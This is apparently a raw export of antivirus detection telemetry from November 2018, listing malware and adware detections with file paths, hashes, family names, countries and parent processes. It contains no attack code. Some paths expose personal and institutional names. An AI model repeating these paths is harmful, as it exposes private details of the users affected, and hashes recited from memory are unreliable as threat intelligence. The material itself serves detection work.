  Row(detection=Row(filename='loghi.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\DOCENZE\\CORSO CARVICO\\LOGHI.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:22:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='kata                                   .scr', filepath='E:\\kata                                   .scr', filesize=64000, name='W32/Sality.K.#M1.#R1'), hash='e562a79153316650e911a59240cf1949e94b5b45d5e72143edefd294716ab455', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T19:35:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-222701-6ea70d86', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-222645-6533CACD\\AVSCAN-20181101-222701-6EA70D86', filesize=640000, name='TR/RedCap.xaclj.#M1.#R1'), hash='c980ed2cdf5a796dd132a46207a4e3e5f03675d66c465cff0294dad34b9591c4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T21:27:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashUpdate.exe', filesize=1536000, name='TR/Dropper.Gen.#M300.#R3467'), hash='a766e86b8157a590bafa1466d0c2883d87541742f26db5ffa165b403124cfacf', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-01T14:13:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\windows\\syswow64\\config\\manual\\1\\2\\3\\1\\1\\1\\1\\1\\1\\2\\3\\1\\1\\1\\tib\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.82.#M1.#R1'), hash='9d4f0082ca27b8ec25f8b7ba843e8ee360efab2c8fcdf00066e6700bdfcbc75e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T11:45:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='rea.exe', filepath="E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ESAMI SETTEMBRE 2017\\ASA\\domande d'esame\\rea.exe", filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:32:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-095618-8702c1a8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-095618-8702C1A8', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:56:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a2493556f627f0ef0f49c27d469ad8e11a95bcabb5b5964eb11ea2b9d80f2f59', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_29.10.2018-30.categorizing\\A2493556F627F0EF0F49C27D469AD8E11A95BCABB5B5964EB11EA2B9D80F2F59', filesize=512000, name='TR/Patched.Ren.Gen.#M300.#R3290'), hash='a2493556f627f0ef0f49c27d469ad8e11a95bcabb5b5964eb11ea2b9d80f2f59', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-01T07:20:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-093856-bf48618d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-093856-BF48618D', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:39:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gcld_tw.exe', filepath='c:\\users\\X\\appdata\\local\\temp\\rar$exa7148.40047\\馴傑奪模\\gcld_tw.exe', filesize=2752000, name='TR/Agent.tuujo.#M1.#R1'), hash='c76c7d5a7bdb96b83c3702d2947f2e8059ba1a384f168696692d75b77c4fde8a', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\WinRAR\\WinRAR.exe', parentsize=2235096, timestamp='2018-11-01T07:27:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='caruso francesca paola.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\ENGIM2014-2015\\engim varie\\STAGE 573160\\CARUSO FRANCESCA PAOLA.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:27:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mahanadi.exe', filepath='G:\\\xa0\\mahanadi\\mahanadi.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:50:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='stage 573160.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\ENGIM2014-2015\\engim varie\\STAGE 573160.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:26:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0003436.exe', filepath='f:\\system volume information\\_restore{c479216e-5d38-4428-b4db-e28930c85d49}\\rp8\\A0003436.EXE', filesize=512000, name='W32/Virut.Gen.#M1.#R1'), hash='8a9c2f6f1cf2989e39a3f55a6711bfdc4d53640c0b5ee26f8c6b96ba71c8701a', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:29:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0002444f', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp0002444f', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:52:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate (1).exe', filepath='C:\\Users\\X\\Downloads\\flashupdate (1).exe', filesize=1536000, name='TR/CoinMiner.BZ.#M1.#R1'), hash='070eb33afc11530df004f70b7d8dd606ab877a41d14e253a01ca5da759365976', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T09:25:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='4c3462163032f87a863cc18e8838b5374794f01000e47becee7f1b8bc3a92083.mrg', filepath='D:\\TotalAutomation\\CategorizationLayer\\27.05.2018-70.available\\Avira\\Others\\PE-detected-Avira\\HEUR.AGEN.1011385\\4c3462163032f87a863cc18e8838b5374794f01000e47becee7f1b8bc3a92083.MRG', filesize=1024000, name='HEUR/AGEN.1011385.#M1.#R1'), hash='4c3462163032f87a863cc18e8838b5374794f01000e47becee7f1b8bc3a92083', metadata=Row(cmdline='D:\\\\\\\\TotalAutomation\\\\\\\\CategorizationLayer\\\\\\\\27.12.2017-314.available\\\\\\\\Avira\\\\\\\\Others\\\\\\\\PE-detected-Avira -PERHASH', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='D:\\TotalAutomation\\Dependencies\\Buf\\WWPERHASH.exe', parentsize=1842176, timestamp='2018-11-04T10:01:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-172632-eeea4f14', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e28951c1\\AVSCAN-20181104-170735-27CB4304\\AVSCAN-20181104-172632-EEEA4F14', filesize=768000, name='WORM/Pimybot.JA.1.#M1.#R1'), hash='5cc1e61c072716b3441ffa86c7e63567559b222d6f7826a593b9793e5bd8d99c', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:26:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='datamngrui.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Movies Toolbar\\Datamngr\\DatamngrUI.exe', filesize=3584000, name='PUA/iLivid.iona.#M1.#R1'), hash='7a0dcdb58d4e5bbf303af3c6c5f9063ecfeb2e404d5797577234cd26d8be0b56', metadata=Row(cmdline=None, country='NI', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T20:57:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flt-sc2hots.exe', filepath='e:\\program files (x86)\\starcraft ii\\activation\\flt-sc2hots.exe', filesize=256000, name='APPL/RedCap.69d21a.#M1.#R1'), hash='69d21a5a5b20fa0f31a837f3ce09115993d2ef55d1a6c347c7c17bd3e803b787', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='E:\\Program Files (x86)\\StarCraft II\\Launcher.exe', parentsize=1973248, timestamp='2018-11-04T13:08:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp000240f1', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp000240f1', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:44:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-195800-152ab8e9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2754a3e3\\AVSCAN-20181104-173744-35C87BC3\\AVSCAN-20181104-195800-152AB8E9', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='398b9784731795a2a9159ae69dea840751d74fbe0f64b1e1929ea2fce6c6f138', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T18:58:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-064850-89f93440', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_99b6583d\\AVSCAN-20181105-063616-3B39D34A\\AVSCAN-20181105-064850-89F93440', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T23:48:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='kingdoms and castles v110 trainer +2 mrantifun.exe', filepath='c:\\users\\X\\appdata\\local\\temp\\rar$exa2956.43644\\kingdoms and castles v110 trainer +2 mrantifun.exe', filesize=4800000, name='SPR/CheatEngine.3328b7.#M1.#R1'), hash='3328b7c01291df1085c1180020755a9496ad2e5556082f99c77b03f2248be8bd', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\WinRAR\\WinRAR.exe', parentsize=1567448, timestamp='2018-11-04T17:27:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='pegawai.exe', filepath='F:\\Database\\Prog_LPD\\Exeprog-mdk\\Pegawai.exe', filesize=320000, name='W32/Virut.Gen.#M1.#R1'), hash='7e22975aa6d1e50b4aa9969226784f641c159421333f4dc936fc122cbddc1085', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=23784, timestamp='2018-11-04T08:28:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-173932-770e5204', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e28951c1\\AVSCAN-20181104-170735-27CB4304\\AVSCAN-20181104-173932-770E5204', filesize=768000, name='WORM/Pimybot.JA.1.#M1.#R1'), hash='5cc1e61c072716b3441ffa86c7e63567559b222d6f7826a593b9793e5bd8d99c', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:39:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='instmsia.exe', filepath='F:\\FOTO_FOTO\\2003\\Foto_dll\\instmsia.exe', filesize=640000, name='W32/Ramnit.C.#M1.#R1'), hash='487ccdcf7f8c760d5d0b13f6da635b329edc3e4486a4867721dda56ca7bb0cbc', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-04T20:23:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered nilid', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nilid', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3acf7c1425fa9fe9629c4cdaf71a882083cd14a828265aa4a0a21ae3f083965b', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T18:12:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-04-13-51-58.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-27T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T16:11:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181103-210911-a9916dd3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0678b562\\AVSCAN-20181103-203524-E56FFA60\\AVSCAN-20181103-210911-A9916DD3', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='398b9784731795a2a9159ae69dea840751d74fbe0f64b1e1929ea2fce6c6f138', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T00:09:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='eb0159bade25087a7f336578bc68885103480947', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\eb0159bade25087a7f336578bc68885103480947', filesize=320000, name='Adware/DealPly.8e7149.#M1.#R1'), hash='8e714996acb1dbe2cec72130ceadd9fe60cdbf128591304fd5ceff803b67493c', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T18:58:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-200243-bec2df2d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_eebce64d\\AVSCAN-20181104-195628-860846F4\\AVSCAN-20181104-200243-BEC2DF2D', filesize=4544000, name='PUA/GameModding.#M1.#R1'), hash='593f78ed27d76245cfb534f33b6b7ddcfd1ef961829c62a0e07526af6f6b15e7', metadata=Row(cmdline=None, country='RS', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:02:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-173739-63600010', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e28951c1\\AVSCAN-20181104-170735-27CB4304\\AVSCAN-20181104-173739-63600010', filesize=768000, name='WORM/Pimybot.JA.1.#M1.#R1'), hash='5cc1e61c072716b3441ffa86c7e63567559b222d6f7826a593b9793e5bd8d99c', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:37:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-131119-463dfbe3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1ee14c03\\AVSCAN-20181104-130740-20707A78\\AVSCAN-20181104-131119-463DFBE3', filesize=5260000, name='PUA/EDownloader.Gen7.#M1.#R1'), hash='003ba151219f945cb613302233617c71dbf7754e1527a1430de85cb1ac4d433f', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:11:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mes images.exe', filepath='D:\\Mes images.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='5f9c58fa91578780ab3658e472f25933a098ca5641aea2e383cba2d91d3c30d7', metadata=Row(cmdline='rtp', country='BF', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-04T23:16:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T14:13:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mhautopatch.exe', filepath='C:\\Users\\X\\Downloads\\msoxh\\msoxh\\MHAutoPatch.exe', filesize=2560000, name='TR/Black.Gen2.#M300.#R100338'), hash='3600f95d74d3eedb693c26f0533afc0ac366bd857770711dbe9dafee1340bc5a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Windows\\explorer.exe', parentsize=2380944, timestamp='2018-11-04T16:16:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='service_kms.exe', filepath='\\\\?\\C:\\Program Files\\KMSpico\\Service_KMS.exe', filesize=448000, name='TR/Kazy.157208.2.#M1.#R1'), hash='1f416428c46b91b1e1caa0bf7c99c74efdbc3c8db7e5946825d08c63569ea0b9', metadata=Row(cmdline=None, country='SD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T21:36:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='photo tablette.exe', filepath='G:\\photo tablette.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline='rtp', country='SN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1866864, timestamp='2018-11-04T17:13:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T10:11:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-055402-3e5005f0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_01dbbab1\\AVSCAN-20181105-054924-2355A1B0\\AVSCAN-20181105-055402-3E5005F0', filesize=64000, name='TR/Crypt.XPACK.Gen.#M300.#R3769'), hash='1cba90497fecccb4be2afd31e0f8794ea23c3df658ba3da01173d9c08aded7e1', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T21:54:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-074315-5e901d8f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8277d26c\\AVSCAN-20181104-073910-47933920\\AVSCAN-20181104-074315-5E901D8F', filesize=2048000, name='ADWARE/MultiPlug.Gen4.#M1.#R1'), hash='01be1d0ace10ca603b47b7bed971792068480351b79216479cc1d7b375e1a87d', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:46:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-172243-c6e82bcd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e28951c1\\AVSCAN-20181104-170735-27CB4304\\AVSCAN-20181104-172243-C6E82BCD', filesize=768000, name='WORM/Pimybot.JA.1.#M1.#R1'), hash='5642847f2a431c9c5852b1e5ebe606f11acd628c251cc8d30f75beadc612518d', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:22:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0015d49a', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp0015d49a', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T11:42:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avjebmi.exe', filepath='\\\\?\\E:\\PASTOR ELOY GARCIA C\\AppData\\Local\\avjebmi.exe', filesize=3072000, name='ADWARE/Lollipop.Gen4.#M300.#R300075'), hash='0a11464c7e25c439e48278628a11ddcb6252c622e70ffa1ec4ba74e198e4c5c0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:59:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0015d788', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp0015d788', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T11:43:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='up.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\QBF4CEG69X\\up.exe', filesize=2560000, name='TR/Dropper.Gen.#M300.#R4133'), hash='5f6d91dc158563cdc7ff95397bffd5c02f5a48b3424dbfaf5e557e1bbfd7e2b0', metadata=Row(cmdline='\\\\\\/autorun \\\\\\/AdvanceScan', country='HU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare\\AutoCare.exe', parentsize=1732880, timestamp='2018-11-04T06:53:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='winzip20-pp.exe', filepath='C:\\Users\\X\\Downloads\\winzip20-pp.exe', filesize=1544000, name='PUA/InstallCore.Gen.#M300.#R8158'), hash='a6af29130b37d8eb0e1b3b0d4a52a72e995de380595d877700aa54d5d593e40d', metadata=Row(cmdline=None, country='ZA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3933184, timestamp='2018-11-04T17:37:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T23:49:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-102353-b941a183', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_506666b0\\AVSCAN-20181104-102311-B272E1FD\\AVSCAN-20181104-102353-B941A183', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T03:23:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T19:43:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate.exe', filepath='D:\\New folder\\flashupdate.exe', filesize=1536000, name='W32/Sality.Patched.#M1.#R1'), hash='841d93e5e973c4e2a482c390704aa9f8ce9fba9c03f60af15ed8129a67a203a6', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:57:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered tisir', filepath='C:\\WINDOWS\\System32\\Tasks\\Yahoo! Powered tisir', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='8526df54488745e1e85c05d2a04cd546df21d06ba727eeae68b84f25a5b2cf6b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T03:00:13Z'), dt=datetime.date(2018, 11, 4)),
